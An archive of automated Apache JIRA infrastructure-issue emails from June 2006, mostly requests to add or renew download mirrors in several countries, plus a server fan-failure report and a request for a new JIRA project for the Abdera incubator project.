MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-800?page=all ] Joshua Slive resolved INFRA-800: -------------------------------- Resolution: Fixed Thanks. This will be in the next update. > New mirror in Argentina > ----------------------- > > Key: INFRA-800 > URL: http://issues.apache.org/jira/browse/INFRA-800 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Federico Alvarez > > URL of mirror: http://apache.wnpower.com > Country where the mirror is located: Argentina > Contact email address: [email protected] > Update frequency: daily at 1:50 and 13:50 hs > Rsync repository used: rsync.apache.org > Approximate bandwidth: 100 Mbit > I have configured my HTTP server as requested: Yes > I have subscribed to the mirror maintainers mailing list: Yes > Logo: http://www.wnpower.com/mirror_apache.gif > URL: http://www.wnpower.com -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:31:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25979 invoked from network); 16 Jun 2006 14:31:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:31:56 -0000 Received: (qmail 89998 invoked by uid 500); 16 Jun 2006 14:31:51 -0000 Delivered-To: [email protected] Received: (qmail 89627 invoked by uid 500); 16 Jun 2006 14:31:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89544 invoked by uid 99); 16 Jun 2006 14:31:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:31:49 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:31:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 221AD71429D for <[email protected]>; Fri, 16 Jun 2006 14:30:31 +0000 (GMT) Message-ID: <14792512.1150468231136.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:30:31 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-844) New Apache Mirror In-Reply-To: <12560094.1150256132858.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-844?page=all ] Joshua Slive resolved INFRA-844: -------------------------------- Resolution: Fixed Thanks. You'll be back in the next update. > New Apache Mirror > ----------------- > > Key: INFRA-844 > URL: http://issues.apache.org/jira/browse/INFRA-844 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Reporter: Jeong, Heon > > URL : > http://ftp.kaist.ac.kr > Country where the mirror is located : > Korea, republic of > Contact email address : > [email protected] > Update frequency : > 1~2 per day > Rsync repository used : > rsync.apache.org > Approximate bandwidth : > 100Mbps > I have followed the recommended configuration for my mirror : > yes > Logo : > http://ftp.kaist.ac.kr/kaist-logo.png > (link to: http://ftp.kaist.ac.kr ) -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:33:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27964 invoked from network); 16 Jun 2006 14:33:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:33:53 -0000 Received: (qmail 93381 invoked by uid 500); 16 Jun 2006 14:33:48 -0000 Delivered-To: [email protected] Received: (qmail 93065 invoked by uid 500); 16 Jun 2006 14:33:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93054 invoked by uid 99); 16 Jun 2006 14:33:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:33:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:33:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 366CF71429B for <[email protected]>; Fri, 16 Jun 2006 14:32:30 +0000 (GMT) Message-ID: <20651942.1150468350204.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:32:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-781) Please renew the mirror at our location In-Reply-To: <9278920.1146505666695.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-781?page=all ] Joshua Slive resolved INFRA-781: -------------------------------- Resolution: Fixed Thanks. You will be back in the next update. > Please renew the mirror at our location > --------------------------------------- > > Key: INFRA-781 > URL: http://issues.apache.org/jira/browse/INFRA-781 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Environment: Fedora Core 4 > Apache 2.2.2 > Reporter: Steven Gonzales > > Please check the mirror at http://www.eng.lsu.edu/mirrors/apache, verify, and place into your mirrors list. > Apologies for any lapses. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:34:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29061 invoked from network); 16 Jun 2006 14:34:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:34:04 -0000 Received: (qmail 94093 invoked by uid 500); 16 Jun 2006 14:33:54 -0000 Delivered-To: [email protected] Received: (qmail 93597 invoked by uid 500); 16 Jun 2006 14:33:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93502 invoked by uid 99); 16 Jun 2006 14:33:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:33:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:33:50 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1E9F67142CF for <[email protected]>; Fri, 16 Jun 2006 14:32:34 +0000 (GMT) Message-ID: <6107330.1150468354122.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:32:34 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-845) New mirror FRANCE In-Reply-To: <29958559.1150361910953.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-845?page=3Dall ] =20 Joshua Slive resolved INFRA-845: -------------------------------- Resolution: Fixed Thanks. You will be in the next update. > New mirror FRANCE > ----------------- > > Key: INFRA-845 > URL: http://issues.apache.org/jira/browse/INFRA-845 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues)=20 > Components: Mirrors > Reporter: Philippe BAQU=C3=89 > > URL of mirror: http://apache.cict.fr/ > Country where the mirror is located: FRANCE > Contact email address: [email protected] > Update frequency: 8hour > Rsync repository used:rsync.eu.apache.org > Approximate bandwidth: 100Mb > I have configured my HTTP server as requested (yes/no) YES > I have subscribed to the mirror maintainers mailing list (yes/no) YES --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:35:50 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29826 invoked from network); 16 Jun 2006 14:35:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:35:50 -0000 Received: (qmail 97473 invoked by uid 500); 16 Jun 2006 14:35:48 -0000 Delivered-To: [email protected] Received: (qmail 97183 invoked by uid 500); 16 Jun 2006 14:35:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97172 invoked by uid 99); 16 Jun 2006 14:35:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:35:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:35:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6C12B71429B for <[email protected]>; Fri, 16 Jun 2006 14:34:30 +0000 (GMT) Message-ID: <8995608.1150468470393.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:34:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-572) new mirror In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-572?page=3Dall ] =20 Joshua Slive resolved INFRA-572: -------------------------------- Resolution: Duplicate > new mirror > ---------- > > Key: INFRA-572 > URL: http://issues.apache.org/jira/browse/INFRA-572 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues)=20 > Components: Mirrors > Reporter: Philippe BAQU=C3=89 > > URL: http://apache.cict.fr/ and ftp://mirror.cict.fr/apache/ > COUNTRY: FRANCE > CONTACT: [email protected] > UPDATE FREQUENCY: 3 per day > RSYNC REPOSITORY USED: rsync.eu.apache.org > BANDWITH: 100Mb > I HAVE CONFIGURED my HHTP SERVER as resquested: YES > I HAVE SUBSCRIBED TO THE MIRROR LIST: YES --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:36:01 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30866 invoked from network); 16 Jun 2006 14:36:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:35:59 -0000 Received: (qmail 97976 invoked by uid 500); 16 Jun 2006 14:35:53 -0000 Delivered-To: [email protected] Received: (qmail 97616 invoked by uid 500); 16 Jun 2006 14:35:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97542 invoked by uid 99); 16 Jun 2006 14:35:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:35:49 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:35:48 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3A88F410007 for <[email protected]>; Fri, 16 Jun 2006 14:34:32 +0000 (GMT) Message-ID: <10097850.1150468472237.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:34:32 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-837) New mirror in FRANCE In-Reply-To: <24850473.1149719850867.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-837?page=all ] Joshua Slive resolved INFRA-837: -------------------------------- Resolution: Fixed Thanks. You'll be in the next update. > New mirror in FRANCE > -------------------- > > Key: INFRA-837 > URL: http://issues.apache.org/jira/browse/INFRA-837 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Environment: Apache > Reporter: MULTIDIST SARL > > URL of mirror : apache.multidist.com > Country where the mirror is located FRANCE > Contact email address [email protected] > Update frequency 1per day > Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ > Approximate bandwidth 10Mb > I have configured my HTTP server as requested (yes/no) YES > I have subscribed to the mirror maintainers mailing list (yes/no) YES > Logo http://www.multidist.com/images/multidist.gif > Site : http://www.multidist.com -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 15:16:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44063 invoked from network); 16 Jun 2006 15:16:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 15:16:53 -0000 Received: (qmail 69250 invoked by uid 500); 16 Jun 2006 15:16:52 -0000 Delivered-To: [email protected] Received: (qmail 68970 invoked by uid 500); 16 Jun 2006 15:16:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68959 invoked by uid 99); 16 Jun 2006 15:16:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 08:16:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 08:16:50 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CD96071429D for <[email protected]>; Fri, 16 Jun 2006 15:15:33 +0000 (GMT) Message-ID: <11903769.1150470933839.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 15:15:33 +0000 (GMT+00:00) From: "Stefan Boudry (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-846) http mirror fixed MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N http mirror fixed ----------------- Key: INFRA-846 URL: http://issues.apache.org/jira/browse/INFRA-846 Project: Infrastructure Type: Improvement Security: public (Regular issues) Components: Mirrors Reporter: Stefan Boudry Priority: Minor * URL: http://apache.scarlet.be * Country: Belgium * Contact: [email protected] * Update frequency: 6h * Rsync repository: rsync.eu.apache.org * Approximate bandwidth: 1000mbit * I have configured my HTTP server as requested: yes * I have subscribed to the mirror maintainers mailing list: yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 23:13:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20618 invoked from network); 16 Jun 2006 23:13:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 23:13:51 -0000 Received: (qmail 92487 invoked by uid 500); 16 Jun 2006 23:13:49 -0000 Delivered-To: [email protected] Received: (qmail 92199 invoked by uid 500); 16 Jun 2006 23:13:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92187 invoked by uid 99); 16 Jun 2006 23:13:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 16:13:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 16:13:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2D8387141E0 for <[email protected]>; Fri, 16 Jun 2006 23:12:30 +0000 (GMT) Message-ID: <1563689.1150499550168.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 23:12:30 +0000 (GMT+00:00) From: "Phil Evans (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-827) New mirror - please add In-Reply-To: <9824324.1149212971303.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-827?page=comments#action_12416598 ] Phil Evans commented on INFRA-827: ---------------------------------- I have sorted this now. There was a temporary name resolution issue on the server but that has now been solved and is now up to date. Thanks. > New mirror - please add > ----------------------- > > Key: INFRA-827 > URL: http://issues.apache.org/jira/browse/INFRA-827 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Reporter: Phil Evans > > URL of mirror: http://mirrors.probonic.com/apache/ ftp://mirrors.probonic.com/apache/ > Country: United States, TX > Contact email: [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.apache.org > Approx. bandwidth: 100mbit > I have configured my HTTP server as requested: yes > I have subscribed to the mirror maintainers mailing list: yes > URL to 100x34 logo: http://www.probonic.com/images/logo10034.gif > Link for image: http://www.probonic.com > Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 17 15:01:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99142 invoked from network); 17 Jun 2006 15:01:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Jun 2006 15:01:54 -0000 Received: (qmail 89706 invoked by uid 500); 17 Jun 2006 15:01:49 -0000 Delivered-To: [email protected] Received: (qmail 89425 invoked by uid 500); 17 Jun 2006 15:01:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89409 invoked by uid 99); 17 Jun 2006 15:01:48 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 17 Jun 2006 08:01:48 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 17 Jun 2006 08:01:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C56BD410005 for <[email protected]>; Sat, 17 Jun 2006 15:00:29 +0000 (GMT) Message-ID: <24848692.1150556429778.JavaMail.jira@brutus> Date: Sat, 17 Jun 2006 15:00:29 +0000 (GMT+00:00) From: "Mads Toftum (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-847) Fan failure in helios MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Fan failure in helios --------------------- Key: INFRA-847 URL: http://issues.apache.org/jira/browse/INFRA-847 Project: Infrastructure Type: Bug Security: public (Regular issues) Components: ColoTasks Reporter: Mads Toftum Priority: Minor /usr/sfw/bin/ipmitool -v chassis status says: Cooling/Fan Fault : true fan8.tach | 60.000 | RPM | cr | na | 1980.000 | na | na | na | na The other fans run at more than 6200 rpm. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 18 05:35:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40607 invoked from network); 18 Jun 2006 05:35:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2006 05:35:57 -0000 Received: (qmail 59050 invoked by uid 500); 18 Jun 2006 05:35:50 -0000 Delivered-To: [email protected] Received: (qmail 58857 invoked by uid 500); 18 Jun 2006 05:35:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58846 invoked by uid 99); 18 Jun 2006 05:35:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 17 Jun 2006 22:35:49 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 17 Jun 2006 22:35:48 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D3009410006 for <[email protected]>; Sun, 18 Jun 2006 05:34:29 +0000 (GMT) Message-ID: <29229504.1150608869861.JavaMail.jira@brutus> Date: Sun, 18 Jun 2006 05:34:29 +0000 (GMT+00:00) From: "Gavin (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-848) Create new Jira Project for Incubator Preoject Abdera MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Create new Jira Project for Incubator Preoject Abdera ----------------------------------------------------- Key: INFRA-848 URL: http://issues.apache.org/jira/browse/INFRA-848 Project: Infrastructure Type: Task Security: public (Regular issues) Components: JIRA Reporter: Gavin Hi All, The new Incubator project 'Abdera' would like to have a new Jira Project. I tried adding a new request for 'New Jira Project' but the system did not recognise any names I put in there for the Jira Admin. As Mentors I tried putting in 'Garrett Rooney' and/or 'Paul Querna' as Jira Admin but would not be accepted by the system. Also, here is a list of initial names to be granted 'dev' status to Abdera Jira (in addition to the two Admin named above). Sam Ruby Yoav Shapira James M Snell Elias Torres Robert Yates Gavin McDonald Martin Cooper Stephen Duncan -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 18 12:49:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1119 invoked from network); 18 Jun 2006 12:49:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2006 12:49:02 -0000 Received: (qmail 88657 invoked by uid 500); 18 Jun 2006 12:48:59 -0000 Delivered-To: [email protected] Received: (qmail 88419 invoked by uid 500); 18 Jun 2006 12:48:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88407 invoked by uid 99); 18 Jun 2006 12:48:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 05:48:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 05:48:57 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id EEEA0410005 for <[email protected]>; Sun, 18 Jun 2006 12:47:37 +0000 (GMT) Message-ID: <29026020.1150634857959.JavaMail.jira@brutus> Date: Sun, 18 Jun 2006 12:47:37 +0000 (GMT+00:00) From: "Vahan Yerkanian (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-849) New Armenian mirror MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New Armenian mirror ------------------- Key: INFRA-849 URL: http://issues.apache.org/jira/browse/INFRA-849 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mirrors Reporter: Vahan Yerkanian * URL of mirror - http://apache.mirrors.arminco.com/ * Country where the mirror is located - Armenia * Contact email address - [email protected] * Update frequency - once a day * Rsync repository used - rsync.eu.apache.org * Approximate bandwidth - 1Gigabit country-wide * I have configured my HTTP server as requested (yes/no) - yes * I have subscribed to the mirror maintainers mailing list (yes/no) - yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 18 13:32:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15382 invoked from network); 18 Jun 2006 13:32:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2006 13:32:57 -0000 Received: (qmail 9347 invoked by uid 500); 18 Jun 2006 13:32:54 -0000 Delivered-To: [email protected] Received: (qmail 8619 invoked by uid 500); 18 Jun 2006 13:32:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8602 invoked by uid 99); 18 Jun 2006 13:32:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 06:32:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Jun 2006 06:32:49 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) 